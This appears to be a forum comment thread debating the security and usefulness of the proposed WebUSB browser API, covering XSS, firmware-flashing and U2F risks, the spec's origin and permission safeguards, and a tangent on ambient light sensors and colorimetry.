> There is no reason whatsoever to allow remote access to USB devices.
Unless you want to connect your local USB device to some VM in the cloud. Which is the direct use case that came up when this came up in discussion with Reilly Grant when we were both at VMware. It comes up surprisingly often as a requested feature, as IT organizations get increasingly lazy/less funded/laid off and don't want to have to install clients or anything on local machines, just pop open a browser, point it at the VM and connect up the device.
Not that I'm advocating for this in any way... I thought it was pretty out there (along with WebMIDI), but hey, why not, the Web Browser is the One True Platform and everyone and their parent company and sister company has nearly quit doing native application development on any OS (as sad as that makes me).
If you want to connect a USB device to the cloud, that's great. All you need is a usb<->socks proxy running on your local machine, tunneling USB traffic to the remote server.
Why should we build this functionality into the browser? Is it really that much more convenient than installing an app to run the proxy?
The use case you describe is sufficiently rare, that if you need it, downloading an app should not be a high cost to pay. If only 1% of browser users need this USB proxy, why expose an additional attack surface for the 99% who do not need it?
I'm thinking of HTML5 media tags. There's a standard way to specify that something is a piece of media to play, but the browser needs to also have the right codec for that media.
There could be something similar for USB, where there might not even be any "codecs" (drivers) included by default in browsers, but where there's a defined method of making USB devices available.
You'd still have to install a plugin for each device type that your browser doesn't natively understand, but standardization for how to make specific device types available to the browser would be much simpler. And there could be "rewriting proxy" drivers available for improved security which limits what requests that are possible, preventing most hardware exploits.
Although this might still be too much work for little gain.
If you need to install a plugin, why not install an app? Presumably plugins will need to be written for each different browser, just as apps need to be written for each different OS. So there would be very little gain.
> Why should we build this functionality into the browser? Is it really that much more convenient than installing an app to run the proxy?
Apparently it is, given how highly requested of a feature it is to have everything you could do with VMRC available through the web browser with no plugins or local software.
Again, I still don't think it's a good idea either, but I also don't like a lot of the crazy shit built into modern web browsers for maybe the 1% users, like the mentioned WebMIDI.
Even if you want to remotely attach a USB device, doing it through the browser is a severely silly way to do it.
Why not attach USB devices over IRC? Or SAMBA? Just because it is possible, doesn't mean that it's reasonable or good.
> There is no reason whatsoever to allow remote access to USB devices
Sorta but that's not what this standard is proposing. It's proposing a way of accessing a USB device from a web browser. There isn't any remote access happening here (at least not directly though with this standard you could theoretically do that).
This is simply so web apps can get closer to native apps in functionality.
> It's proposing a way of accessing a USB device from a web browser.
> There isn't any remote access
If you don't see the contradiction between these two statements, I don't know how to help you.
Stop thinking of what this is supposed to do; it's the failure cases that are the problem. Good security design involves concepts like compartmentalization and defense-in-depth. Finding a browser exploit shouldn't also grant low level access to the USB buss.
> This is simply so web apps can get closer to native apps in functionality.
That's a terrible idea. Blurring the lines between a webpage and a native app simply teaches people to treat webpages as if they were a local app, when the should be learning to treat anything form the network as potentially hostile. If you don't have a clean separation between the remote UI and the local UI, you're creating the perfect situation for phishing attacks.
> If you don't see the contradiction between these two statements, I don't know how to help you.
Alternatively you could be more constructive and try to explain what your position here is because, as I'm reading this standard, I'm not seeing any remote access (it's all client-side). Granted, like I already mentioned, once access is granted you could use something like web sockets to make it accessible remotely but that's a very explicit thing a developer or malicious app has to do. Which, granted, is possible but the user also has to give it access to do such a thing which is no different than allowing camera access which already exists in a similar way.
If you want to argue that anything that can be coded to be accessed remotely is outright remote access then...well just about everything is remote access and it kinda loses its meaning.
> Stop thinking of what this is supposed to do; it's the failure cases that are the problem. Good security design involves concepts like compartmentalization and defense-in-depth. Finding a browser exploit shouldn't also grant low level access to the USB buss.
This shows me you didn't even read the standard. The standard OUTRIGHT says the same thing as you and outlines how their standard WOULD NOT grant low level access to the USB bus.
So why even bother commenting if you're not even going to read what's in the standard and comment, incorrectly, about it? This isn't really typical on Hacker News.
> I'm not seeing any remote access (it's all client-side)
Anything that can be accessed client-side can be easily uploaded via XmlHttpRequest or whatever people use for that now. This is not a new concept.
> Granted, like I already mentioned, once access is granted you could use something like web sockets to make it accessible remotely but that's a very explicit thing a developer or malicious app has to do.
Hardly- user data is incredibly valuable and you can be sure that for many sites, if a page has access to USB info they will upload and track it. Presumably any foreign JS code imported (e.g. Google Analytics) can also access this data and include it in the information it tracks.
> Anything that can be accessed client-side can be easily uploaded via XmlHttpRequest or whatever people use for that now. This is not a new concept.
Correct but this standard is absolutely not "remote access to USB devices" as the parent suggested. If we're going to abstract the meaning of "remote" to anything that can be uploaded by something that can access it then it loses its meaning entirely.
The standard proposes nothing remote from the web to the browser; it's entirely between USB devices and the browser. Saying "allow remote access to USB devices" is entirely misleading hence my original comment.
> Hardly- user data is incredibly valuable and you can be sure that for many sites, if a page has access to USB info they will upload and track it. Presumably any foreign JS code imported (e.g. Google Analytics) can also access this data and include it in the information it tracks.
What's the "hardly" for? You and I don't seem to be disagreeing here.
I think perhaps the point that the others in this thread are making should be rephrased: you execute untrusted code in the browser, and giving that untrusted code effectively direct access to the USB peripherals is frightening. If you trust some website with "webUSB permissions", and that website has a cross-site scripting vulnerability, you've given a remote actor the ability to manipulate some USB device(s).
That being said, I'm a little confused about your definition of "remote" access. If I have a jetty server with a remotely exploitable hole in it, someone who exploits that hole is depending on me running a local client, but I would still consider it a "remote" exploit. In the same vein, someone running a browser that I can compromise with purely code on external websites is still being "remotely exploited." The attack vector requires the client to visit a specific page or click a specific link, but I didn't have to walk up to their computer and insert a USB stick. That's what makes the attack a "remote" attack for me.
> you execute untrusted code in the browser, and giving that untrusted code effectively direct access to the USB peripherals is frightening.
But if you read the linked specification you're not doing that. You're giving them access to an abstraction that is quite limited in what it can do. If you had direct access you could reflash firmware.
> If I have a jetty server with a remotely exploitable hole in it, someone who exploits that hole is depending on me running a local client, but I would still consider it a "remote" exploit.
Yes of course that's "remote". It requires network connections to access.
> In the same vein, someone running a browser that I can compromise with purely code on external websites is still being "remotely exploited." The attack vector requires the client to visit a specific page or click a specific link, but I didn't have to walk up to their computer and insert a USB stick. That's what makes the attack a "remote" attack for me.
That's not remote at all. That's entirely client based. The client just happens to load some sort of exploit on its own. If it was really remote you could push a script to the client using its network address.
The client functions the same with or without internet connectivity. The jetty server example does not.
Well, I think we'll have to agree to disagree here on terminology!
When a browser gets a malicious advertisement or a user gets a malicious cross-site scripting attack, I consider that remote exploit. Yes, it required the client to do something (i.e. visit a malicious page), but there are plenty of things which you can do to create that state without much user interaction. If I might ask, what do you call attacks like these?
I agree though that my Jetty example wasn't a good one, I was just making the point that the exploit was still in client code (i.e. something running on the victim's machine).
> If you don't have a clean separation between the remote UI and the local UI, you're creating the perfect situation for phishing attacks.
I don't know what you're imagining my computer works like, but I don't have a separation between local and remote UI. I have a separation between OS and application UI (e.g. the Windows Ctrl+Alt+Del dialogue) but everything else is untrustworthy, local or no. A local app can be executing untrusted logic "sourced from" the internet just as well as a remote app can. To say otherwise is to presume that all updates to all apps on your PC go through a third-party that verifies that they never add any remotely-accessible "extension points" that weren't there in previous updates. Obviously, this is not the case, even for the strictest corporate device-management release-engineering program.
It might be a terrible idea, but keep in mind that practically every development platform aside from the web is becoming more and more locked down as time passes (app stores, etc).
Which sucks, obviously, but it's not surprising that there's an attempt to bring the web closer to parity with native, since it seems to be a more tractable problem than stoping what's happening to native platforms.
I am not sure I agree "browsers generally have a better permission model than desktop apps". Yes, browsers ask the user if they would like to allow, but do desktops apps have rampant XSS vulnerabilities? If you allow a site to use USB, you have to be worried that any XSS vulnerability will compromise your USB devices.
Weirdly enough I was talking a couple of days ago about requiring things like CSP (which would go very far in defeating XSS) for stuff like webcrypto and other sensitive bits of HTML5.
Someone working for one of the major browsers mentioned they'd considered it but decided against it - not sure on the reasons why but if they're reading this they might like to elucidate...
That would be a good first step. It would have to be a subset of CSP. Don't allow inline scripts or eval.. Only on https is another step I see as very important.
One reason might be that developers would probably just do the minimum possible CSP rather than following the spirit of it. Unlike with HTTPS, a CSP could be created with the exact same security model as no CSP using directives like unsafe-eval.
I am not sure what you are getting at. Those don't occur on the web and are not an issue with desktop apps you install. If a desktop app wants to run a bash command, it can do it. It doesn't need to find a bash injection.
There isn't easily exploitable issues like XSS on the desktop. Meaning, if you run a desktop app you generally don't have to worry that some rogue code is injected into the app, unless the developers keys are stolen which is rare.
Exactly. Combine a XSS attack with USB keyboard monitoring and you've got ridiculously powerful password harvesting. That's just one potential attack of many.
That's not at all an accurate framing. I'm not aware of any implementation that plans to allow access to HID devices (keyboard, mouse, etc.) or other device classes that are already handled natively by the browser/OS. Even ignoring security, just think of what a mess the user experience would be if sites could unbind and override native devices.
When - not if - someone finds an implementation bug in either the browser or the USB hardware, we will see exploits far worse than keylogging passwords. The bug could be in any USB device, not just the subset you're thinking about. Do you really want to trust your host-controller, every USB device, and the browser interface to be bug free? Are you sure there are no subtle non-bug interactions between devices? Have you even seen how USB devices are designed?
Limitations like "no HID devices" are how it's supposed to work, which is different from how it will actually work.
Sorry, but I'm at a loss for what you believe you're responding to here. I made a clear, factual statement regarding the handling of bound USB devices for known devices and classes. Specifically, HID and other native device classes that are already bound by the OS should not be exposed to WebUSB -- the reasons for and robustness of that guarantee should be self-evident to anyone moderately familiar with USB in modern OSes.
Now, if you have a specific argument to make against my statement, then please share it. I have direct experience with the subject here, and ideally can provide context to address such arguments or clear up confusion. However, I really don't think it's productive to respond with non sequitur arguments and personal attacks.
The way USB devices work, they can pretend to be something else and still manage to achieve the ulterior goal. There are some very interesting USB devices on the market which look like one thing, pretend to be something else, and actually are anything but.
Mentioning BadUSB very much implies confusion about the threat models at play. That is, the threat model for BadUSB is a malicious device that attacks the host OS, drivers, or applications. Whereas, the threat model for WebUSB is concerned with malicious sites attacking or abusing physical devices attached to the system.
So, the scenario you seem to be implying would require coordination between a malicious WebUSB site and a malicious device. While I can't claim that it would be impossible, it sure seems to approach de minimis if only given the extent of user interactions and preconditions.
So we're limiting based on USB device type are we? What about USB keyboards with USB ports in them (which are fairly common). They could be registered as USB hubs. One of the main reasons USB security is so poor is that the barriers between device types are not strictly enforced, which has led to problems in the past (for example, USB device spoofing is trivial to do, you can probably imagine the sort of hijinks you can get up to with that).
Sorry, you seem to have misread my statement. Everything you just listed are devices that the OS already natively binds. I'm not aware of anyone considering WebUSB implementations that would unbind native devices and expose them to the Web. Rather, the device-level risks for WebUSB primarily center around devices/interfaces that are not in well-known classes or otherwise are not natively bound and may expose dangerous interfaces (e.g. security credentials, unsigned firmware flashing, etc.).
Every USB device that the browser has access to will have a driver that the OS uses to expose its functionality. It doesn't matter whether that driver is built into the OS or not, the OS driver would still exist. The only other option is if the browser is managing hardware outside of the control of the OS by running with lower level privileges, but that opens up an even bigger security risk.
You suggested in another comment that you had some prior background in this area, are you involved in the development of this new web API?
> You suggested in another comment that you had some prior background in this area, are you involved in the development of this new web API?
Justin Schuh is a Chrome security engineer and is one of the most knowledgeable people on the planet when it comes to browser security. He knows what he's talking about more than virtually anyone else in this thread.
This is not argument from authority. You're free to believe that Justin Schuh is a fraud, or a moron, or just plain wrong in this one instance, but when a person who is an expert in a subject makes a statement that is pertinent to that subject, that is merely called "expertise".
This response just doesn't make sense given that modern OSes expose USB through much higher-level device management and communication APIs. Those are the APIs browsers use, and I've already explained that browsers shouldn't unbind and then expose a device that the OS or another native application has already bound. So, I really don't understand what argument you're trying to make here.
How are users supposed to know whether they can trust a desktop app with near-unlimited access to their computer? Generally they don't, but blindly install it anyway because it seems to do something they need.
I just tested this on the phone today - it sees even my damn ambient light, in real-time. Why the hell is stuff like this allowed to be seen by default in a browser?
That website is not using specific browser features to find other devices. It is using standard JavaScript networking functions to check for known classes of devices on your internal network.
Might be splitting hairs, but it's not like the browser is providing a direct API to that data.
> The same logic could be applied to local software, which inevitably is also remote in origin.
One big difference is that one chooses to download the software and install it on a computer. In a browser, everything gets downloaded and executed automatically, including scripts. It's just a matter of opening or being redirected to a URL.
For the average user the two concepts are not so different. Most people wouldn't think twice about downloading an executable, just like they wouldn't think twice about clicking a link.
Which is why it's even more dangerous to browse the web with all receptors (features) enabled.
Add preloading of links on pages, and you have yourself a constant modifying environment (browser) which is controlled by third parties that don't first require a permission dialog.
So, this is much unsafer than consciously running an executable you've downloaded.
You have to give it permission to use USB, though. The USB functionality might also be something included in software you downloaded for another purpose, without your knowledge.
> The sensible alternative is to not enable this functionality at all.
Far too many people seem to think the solution to security problems to ignore security and only consider the features you want.
This is such a bad idea that I'm starting to question the motives behind it. If I wanted to break the security of an important class of software, it would look something like this "standard".
> USB security is a joke
Most hardware security - USB or otherwise - doesn't exist. Local peripherals were never designed with security in mind.
In order for this to be even vaguely secure, every single device that declares support for WebUSB has to refrain from allowing firmware updates over WebUSB despite how incredibly convenient this is, and despite how much of a support nightmare it would be to roll out bugfixes to users without it, and despite them being developed by hardware manufacturers who generally don't give a fuck about security. I can't see this happening. (Allowing remote firmware updates effectively gives full remote code execution on the host PC to the website behind the device, since it can then emulate USB input devices.)
Oh, I don't disagree; I would bet some of those devices will get owned. My only hope is that the manufacturers will set the "origin allowed" field that says what domains may access the devices.
To see all potential security issues, you need to look at the whole tech stack. A single USB device can have multiple drivers, and although only one is active at any given time the decision over which one to use can be influenced by applications.
"A USB configuration defines the capabilities and features of a device, mainly its power capabilities and interfaces. The device can have multiple configurations, but only one is active at a time. The active configuration isn't chosen by the USB driver stack, but might be initiated by an application, a driver, the device driver. The device driver selects an active configuration.
A configuration can have one or more USB interfaces that define the functionality of the device. Typically, there is a one-to-one correlation between a function and an interface. However, certain devices expose multiple interfaces related to one function."
So let's say I want to exploit this new WebUSB API. If I infect your computer with malware that installs a second USB driver for the hardware I want access to, and this second driver has support for WebUSB, I could theoretically control the driver being used by making a WebUSB request for the device, thereby exposing the hardware for further exploits.
This is what Raymond Chen calls "being on the other side of the airtight hatchway". If you can install an USB driver on my machine, it's because you can run native code on my machine, and so you can use that to talk to the USB device without requiring WebUSB.
The difference between using the malware itself to communicate via the web and using WebUSB to do so would be in malware detection. If an unidentified EXE hidden in your Windows partition is communicating via the web that's going to look a lot more suspect than a driver which is trusted by the system. The malware that installed the driver could remove itself after installing the driver, taking out another way to track it down.
An unidentified process talking to the 'net is more suspicious than one installing drivers?
But fine, let's say the malware installs the driver and deletes itself. What then? How are they going to get the browser to navigate to their site, and the user to click the authorization button?
> "But fine, let's say the malware installs the driver and deletes itself. What then? How are they going to get the browser to navigate to their site, and the user to click the authorization button?"
You could do it a number of different ways. For example, could edit the hosts file (a.k.a. etc/hosts) to point to an amended site for a popular website address, could configure proxy settings on default web browser, could alter the browser shortcut to run a script in the background when the browser starts that scans for WebUSB-enabled devices, could set the driver up to check for updates and disguise the authorisation as the driver update confirmation, etc...
So this antivirus lets the malware install drivers, edit system files and/or replace shortcuts created by other applications, but not talk to the web, when nowadays almost every program connects to the web to check for updates. Do you know how far-fetched that sounds?
The reality is that if this malware gets enough permissions to install drivers, it can certainly talk to a regular device driver and communicate with the web. It doesn't need WebUSB for anything.
Do you really think attackers will respect that limitation after they overflow a buffer in the browser? You're only looking at how it's supposed to work. What matters is how it will be exploited.
Great, now all my devices can share the bandwidth and reliability characteristics of a stoned boy scout trying to send smoke signals with a flammable blanket!
EDIT: and the less said about pairing difficulties the better.
EDIT2: From the downvotes it seems that many people have had a radically different experience from mine, which is good, because mine has been awful.
HTCOne-Dell: 1MB file will transfer ~50% of the time, pairing took several tries.
HTCOne-MBP: complete no-go, doesn't even pair.
Nexus6-MBP: paired first try, works reliably at a blazing 100kb/s.
Nexus6-Dell: doesn't even pair.
Nexus6-Fitbit: takes minutes to download a day's activity over bluetooth classic, stalls out completely 50% of the time. BLE doesn't seem to work at all.
MBP-Fitbit: requires dongle, synced once, has had 100% failure rate ever since.
Dell-Fitbit: requires dongle, 100% failure rate.
Compare to USB which delivers tens of MB/s in bandwidth with 100% reliability and no pairing process (RIP plug and play). I love the promise of bluetooth, but in my experience it has consistently fallen spectacularly short of that promise in every regard.
APIs to access HSMs exist already, though – PKCS11 and friends. And HSMs are designed to deal with accesses questionable sources, so if you wanted to improve their accessibility with a HSM-specific standard, it'd be not much of a headache.
All other bazillion USB devices ever made are not designed to deal with security, and exposing them over the internet will blow up spectacularly.
This is just Google trying to reinforce their everything-in-the-cloud-as-web-app model, which they are in a position to do considering they make one of the leading browsers, especially amongst developers.
It's shoehorning everything into ancient technology ill-suited for any of these applications, which is not exclusively Google's fault of course. First HTML was augmented with Javascript, which was augmented with XHTTPRequest, which led to an increased usage of Javascript (Here's where Google comes in), which led to a lot of manpower being invested in optimizing the Javascript engines (trying to run a quirky dynamic language as fast as possible) and then augmenting the browser with "native" OS features like:
* Full-screen mode
* Clipboard control
* Native notifications, with background workers, etc.
* WebMIDI
* OpenGL
* etc.
Which is basically like building a second operating system on top of the already existing architectures. Google tried to further push people this way by coming up with Chromebooks, which in reality actually serve to reinforce my point, since most (not all!) users find them just not sufficient enough.
Which didn't surprise seasoned OpenGL developers at all, because it happens to us all the time, that we see old memory contents in uninitialized buffer objects.
I wish to be able to browse websites, which contain (a) text, (b) associated images, (c) low forms of interactivity, say, comments, or interactive graphics.
This is pretty much the web 2012, or most of German-language web today still.
For browsergames, let’s just use the same paradigm as with apps instead: Bundle them via node+webkit, and integrate a "run locally" API into browsers that automatically downloads a program and runs it locally in a sandbox, but seperately.
In the long term, for games we’ll need to develop a different concept anyway.
But there’s a good reason why no one develops 3D games in PDF, despite PDF supporting 3D objects, scripting, and modification of the document via scripts.
Allowing access to FIDO U2F devices via this would fundamentally break the security model of U2F. It relies on websites being forced to go through a U2F-specific layer in the browser that ensures websites can only request authentication to that site. Without that, any website could do a forwarding attack where it forwarded the authentication request from any other website to the device and used the response to authenticate as you. In order for this to be used for a second factor, you'd basically have a separate authentication dongle for every website.
Some USB devices can be firmware-flashed over USB. They expose secret commands or additional descriptors for doing this. A popular method is to expose an HID endpoint that is actually used for uploading firmware.
If the implementation allows access to these endpoints in a way that allows them to upload firmware, this is very bad for security.
If you accidentally plug your USB device into an unknown computer on a webpage, it's reasonable to expect that the device could have been reprogrammed. And a reprogrammed USB device may very well expose any descriptor(s) it wants to - HID keyboard, mass storage device, ethernet connection...
Section 2 of the spec names and addresses exactly this concern:
> USB hosts and devices historically trust each other. There are published attacks against USB devices that will accept unsigned firmware updates. These vulnerabilities permit an attacker to gain a foothold in the device and attack the original host or any other host to which they are later connected. For this reason WebUSB does not attempt to provide a mechanism for any web page to connect to arbitrary devices.
...
> For this reason this specification outlines two mechanisms that can be combined by the UA before a site is granted access to a device. First, so that the device can protect itself from malicious sites it can provide a set of origins that are allowed to connect to it. These are similar to the [CORS] mechanism and can conceptually be thought of as treating USB devices as their own origins in the "usb" scheme. For devices manufacturered before this specificiation is adopted information about allowed origins and landing pages can also be provided out of band by being published in a public registry. Second, so that the user's privacy is protected the UA may prompt the user for authorization to allow a site to detect the presense of a device and connect to it.
> USB hosts and devices historically trust each other...
We've seen this exact recipe for years of pain play out again and again. C was designed when programmers wrote code for themselves and other people who weren't trying to break that code; if you manage to overflow a buffer in some command-line utility that uses "gets()", you're basically punching yourself in the face. SMTP was designed to send messages between non-commercial entities who wanted to communicate; then the people who stuffed your mailbox with ads realized they could stuff your internet mailbox with ads almost for free. In both cases, a system built for a trusting environment was used in an untrusting one, and there was much pain.
A public registry and an optional nag about an on-by-default feature won't come close to addressing the problem. With thousands of types of USB devices out there, who will go through and audit them all, and keep the registry up to date? And how many users will see the nag and just do the easiest thing to make it go away, or even have the knowledge to make the decision? It seems like browsers need an "annoying/harmful Web 3.0 features" tab with an ever-growing list of check boxes for WebGL, notifications, geolocation, USB, etc., with all of them set by default to "deny without asking."
This doesn't really fix the problem though.
If WebUSB exists in peoples' browsers, and if a game on a web page asks to connect to your joystick, or some other peripheral, people are going to do it anyway, regardless of the risks.
And plenty of USB devices already exist that will never be maintained by their manufacturers again. There are huge quantities of USB devices in existence where software support is completely limited to the driver CD that comes in the box - those manufacturers don't care about adding their devices to a public registry, or controlling how firmware is updated.
Furthermore, this public registry idea also implies that a USB VID/PID directly correlates with a device. There are USB devices in existence that emulate another USB device in order to utilize built-in drivers (inbox drivers) and maintain compatibility with existing software. There are also different USB devices that use the same VID/PID to identify themselves, because in order to obtain a VID/PID, you have to pay a licensing fee, which is not always feasible to everyone.
If this public registry is used, it may create conflicts.
If the CORS-like public registry entries are always trusted by the browser, it could even create security concerns where remote computers are allowed to seize control of local USB devices.
It would certainly be concerning if USB devices were firmware updated without users' consent, simply by going to the website of the manufacturer. Or even a web advertisement that connects to USB devices...
In the future we may even see some kind of attack on web servers in order to gain access to the USB devices of unsuspecting users...
Fully agree. I don't even see the use cases. For most things that are mentioned in the comments (mostly something like connecting proprietary USB devices to the browser) a native application that proxies the related data to browsers seems like a much better approach. For well understood device classes that would be used by a bigger number of websites it makes far more sense to standardize high level APIs which covers exactly these devices (like it happened for webcam and other stuff).
The WebUSB approach also limits each device to be connected and controlled by exactly one browser frame which makes it not very desirable for sensor and other input applications.
> a native application that proxies the related data to browsers seems like a much better approach
Why do you think that? It seems needlessly complex to me when you could just have a simple permission pop up in the web app. What's the benefit of downloading an executable?
And then you get the permission popup each time you open the page? Seems needlessly annoying to me. Or only once? Then most users would not have an idea on how to revoke the access right. Uninstalling the application they installed for the purpose seems more straightforward.
Besides the permissions stuff giving a single browser window access to raw usb data seems also technically wrong. There are lots of reasons why we now have drivers instead of applications directly using the hardware like 30 years before. A driver or dedicated application can allow multiple clients (browser windows) to access the devices functionality. A driver directly embedded in a web page can't. A driver in the webpage even means that once you close that page the communication state between PC and USB device is in any state (can't see a way for automatically doing anything meaningful on goaway), so the only thing that could be done is disconnect and reconnect the device. So some further implications are: Multiple tabs for your web app are not possible. And even other stuff like Ctrl-R would not work as desired (disconnect device, reconnect device, wait, wait, wait, ...).
There are use cases for things like Arduino (a microcontroller development board). We'd like to allow uploading to Arduino boards from an online IDE. We'd also like to allow for interaction between sensors and actuators on an Arduino board and websites (e.g. programs written in the Scratch visual programming language). Yes, we can do much of this by having the user install a local application that communicates via web sockets, but that has its own security implications and adds an additional step for the user.
Unfortunately the obvious way of doing this with WebUSB is, from a security perspective, equivalent to giving the online IDE the ability to install arbitrary code. The Arduinos with sophisticated enough USB stacks to support WebUSB can also be reprogrammed by sketches to emulate a keyboard and inject keystrokes, including a series of keystrokes that downloads and executes a malicious executable.
> Yes, we can do much of this by having the user install a local application that communicates via web sockets, but that has its own security implications and adds an additional step for the user.
You're target audience is arduino hackers, and you're worried about them installing an app? You need to seriously reassess your assumptions.
It still doesn't make any sense. Who that's not intimidated with soldering irons and wiring circuits up that can literally burst into flames if you do it wrong, is going to say, "Heavens to Betsy! I have to click an installer! My word, I'm comin' down with the vapors!"?
Thanks to all those who are concerned about security aspects of this spec. We must always be asking "what if". But do understand that there is no fundamental difference between installing a 3rd party app on your phone and granting a website access to USB. There is some code, you are granting it permission to mess with your life. The only thing difference here is the context, which you will get used to.
Find another way to access that kind of security hardware. That's the kind of thing that should be mediated through a strictly limited API in the browser anyway, where standardized UI can be provided.
Many people have been using two factor authentication for some web pages through SSL, PKCS11 modules and client side certificates on USB cryptokeys or smartcards for ages.
I always find it funny how each new browser and OS release makes it a little more hidden and a bit more convoluted to set it up. All while more and more web developers complain what a big problem secure authentication on the web is.
That is probably one of the driving forces behind this and similar technologies (NFC and Bluetooth LTE integration with the browser). All technologies supported by 2FA standard Fido U2F incidentally.
So yeah, I understand why adding this to a web browser seems unwanted, but as long as the API is well-defined and built with security as its first and primary concern, this could actually improve the overall security of on-line services significantly by making two-factor authentication something your browser just does, and does right. I can recommend skimming the Fido U2F spec [1] to anyone with doubts about the applicability and necessity of this standard.
The linked article basically starts with a section on privacy and security concerns though, so that is somewhat reassuring.
All you really need for that is a smartcard and a (USB) card reader to plug it into. Those could be integrated into one USB device also. That is an existing technology which is already deployed and in widespread use.
This spec is one of the most interesting features to come to the web. I can think of at least three ways I can use something like this to deliver interesting experiences to users, which would not otherwise be possible.
Yes, it increases the attack surface. This is a real danger, and should not be taken lightly. But no one is taking it lightly.
Another danger, which I haven't seen mentioned yet, is that it increases your fingerprint. If a website can list the Web USB devices currently connected, that's a way to deanonymize you.
But if you set aside those negative qualities, WebUSB, I think, is one of the more important features on the horizon.
For example, I could build and ship a light sensor. The idea is that you'd connect it to your laptop, and websites would be able to react to your environment's lighting + your current screen brightness. Think dynamic color schemes that always look good no matter what kind of monitor you're using, or whether it's night or day. This is only possible with hardware; no amount of software will make this feature available. And I can't think of any convenient way to do it other than WebUSB.
Unfortunately, it looks like their definition of brightness is a floating point number, and that's the only thing their API exposes. Hopefully future versions of the standard will be updated to better match the real world.
What we perceive as brightness is (a) the number of photons of each wavelength that (b) intersect a given point in space and (c) are exiting in a given direction. Obviously, all of this information can't be encoded in digital form. There's simply too much data to encode, let alone measure accurately. But reducing the data to a simple 1D number renders the data almost useless.
No website will be able to achieve good results if the dynamic color scheme is based on a single number.
That's also why the WebUSB spec is exciting. I don't have to wait for this spec to be drafted, or for browsers to support it, or to live with any shortcomings it ships with. I'm free to create.
What kind of physical sensor are you proposing that would give you data like that? I think most ambient light sensors in laptops are just LDRs, which are only capable of giving you a 1D number.
I propose that this is a capital-H Hard Problem, and that new technology is needed to address it. I further propose that this technology exists, but is not yet mainstream. The fact that monitors can be calibrated to great accuracy is proof that the tech exists.
There is an opportunity here, but to understand this space, you have to dive into it. There are some excellent books on the subject of colorimetery, but a quick bootstrapped understanding might look like:
1. Your eyes are designed to fool you.
2. How your eyes fool you is determined entirely by the photons that enter it.
3. Each of these photons has a wavelength. The more of them at a given wavelength, the more your perception shifts.
4. What you perceive as color is a combination of wavelengths. But -- critically -- these combinations affect each other. It is not true to say that the more photons that arrive at a given wavelength, the more intensely you perceive that wavelength. It causes a shift in your perception, but this shift is not necessarily a simple increase in brightness.
These are first principles, and it's a very brief sketch of the problem. But everything else follows from this. What ambient light sensors currently do, how APIs are designed, etc is all secondary. The problem is both as simple and as difficult as outlined above.
Now, you can say that this isn't worth tackling, or that the current systems are good enough, and so on. But you'd be missing out on quite an experience. Seeing the type of results you can get from a perfectly calibrated environment is really mindblowing. And the interesting part is, it's impossible for me to describe these results in text, or by showing you a photo, or a video, for the same reason you can't describe an Oculus experience. You have to be there.
Personally, I find colorimetry one of the most intellectually fun and gratifying areas of science.
I think a sensor that has 3 sub-sensors that respond at roughly the same wavelengths as our cones, and has each sensor's response curve matched to human perception would be good enough, no? Maybe with a clever algorithm to reduce the 3 values to a single perceived brightness value?
I feel like something along those lines must already exist for a number of uses.
If only it were that simple. Consider the end goal: to write a program that causes your monitor to invoke a certain visual experience in the viewer. It's not simply "To show blue" or "To show a certain shade of purple." Those are all meaningless terms without context. Their results are entirely relative, right? If you put some purple next to some blue, whether or not it looks good depends on the background color (called the "surround").
The trouble is, "whether or not it looks good" is also determined by your environment. Some people have crappy monitors, some people have perfect monitors, sometimes it's nighttime, sometimes your room is being lit by the early morning sun. When you look at a screen, all of these factors combine, and leaves you with the impression that something looks good or looks bad.
It gets worse. When you look at a monitor, what's behind your monitor is usually the most important thing. I.e. is the wall in front of you white, or green? Is it dark, or lit by the sun? That's going to affect how you see what's on the monitor. What's behind you is irrelevant, because you can't see it! It doesn't matter at all if the wall behind you is white or black, except insofar as it affects the colors of the wall in front of you. So not only do you need to account for all of the factors outlined above, but the damn thing needs to be aimed properly. I'm pretty sure that the right answer will look something like a sensor that mounts to the back of a laptop screen. But it also needs a sensor pointed at your face, and another sensor pointed straight at your monitor. Only at that point do you begin to have enough information to start writing a program that can make correct decisions.
I don't think direct access to USB devices like your suggesting is a good step forward if for nothing other than practicalities. Think about how many individual USB light sensors your websites would have to support to enable this small feature and the amount of low-level code in such a high-level language. Abstractly thats a great idea but could as easily be added with an addon or browser extension.
I'm not saying its a bad idea, just that this direct path in implementation is.
There are many other (better) ways of implementing it, like the Mozilla light sensor API. If that doesn't satisfy you, you should create a new spec for light sensors combined with a practical implementation and then push W3C to use your spec over Mozilla's.
It's the only way to do it. The light sensor delivers a realtime feed of what your eye currently sees. A website can react appropriately.
It's actually more powerful than monitor calibration. Calibration doesn't account for the viewing condition (the brightness of your environment) whereas this hardware can.
It's a device, so it can feed the information to all the programs on your computer. WebUSB is a way to make it useful from day one, but it's not the sole target.
WebUSB is a way to make it useful from day one => if WebUSB was marketed with this business goal, then why not (except nobody would buy it)? but the implications are so much wider, in terms of security and usability...
Why not WebSATA? WebPCI?
There are certainly a few key actors who would benefit from such a standard (benefits could be time to market), I'm just not sure it's enough benefits for the end user to justify a new standard!
> And I can't think of any convenient way to do it other than WebUSB.
Simple. Deliver a native application with your device sensor that the user has to install (maybe it could even be automatically installed through PnP). This application would provide a webserver on localhost which exposes the lighting information to interested websites. And in contrast to the WebUSB thing it would mediate the access to the USB device (lots of browser windows and processes can get the information instead of only a single one) and it would guarantee that only the relevant information is forwarded and not arbitrary data on an USB channel.
Installing native applications are not always easy and straight forward especially in a commercial environment or an environment with multiple operating systems. For an enterprise they rarely want to push out new applications to every user because it's a pain to support. But tell them to go to a new web app? Easy.
I'm a big fan of native apps over web app. But web apps have a huge practically that's hard to ignore.
I'm very aware of that, as I have worked for a big corporation with such policies for normal users. However I believe that for them browsers which directly access real hardware will seem like an even bigger nightmare than users installing applications.
And you still have the question on how the web app comes to the user: Through a dedicated intranet site? Makes sense if more than one user requires it, but the effort seems similar as packaging a native application and rolling it out automatically through the ITs deployment system. If only very few users (maybe only a single one) requires that hardware both approaches have a high overhead and supporting the device will be most likely rejected.
Getting this web app directly from a third party site will be mostly out of question for the companies you are talking about. Besides the security implications then we also talk about reliability problems ("I can't use my USB device because internet is down...")
> browsers which directly access real hardware will seem like an even bigger nightmare than users installing applications.
If you look at the spec it doesn't directly access hardware and it even acknowledges doing so could be a big security issue. You interface with an abstraction that sits above the hardware that won't give you direct access but, instead, access to a subset of options that pass through the abstraction.
> Through a dedicated intranet site? Makes sense if more than one user requires it, but the effort seems similar as packaging a native application and rolling it out automatically through the ITs deployment system.
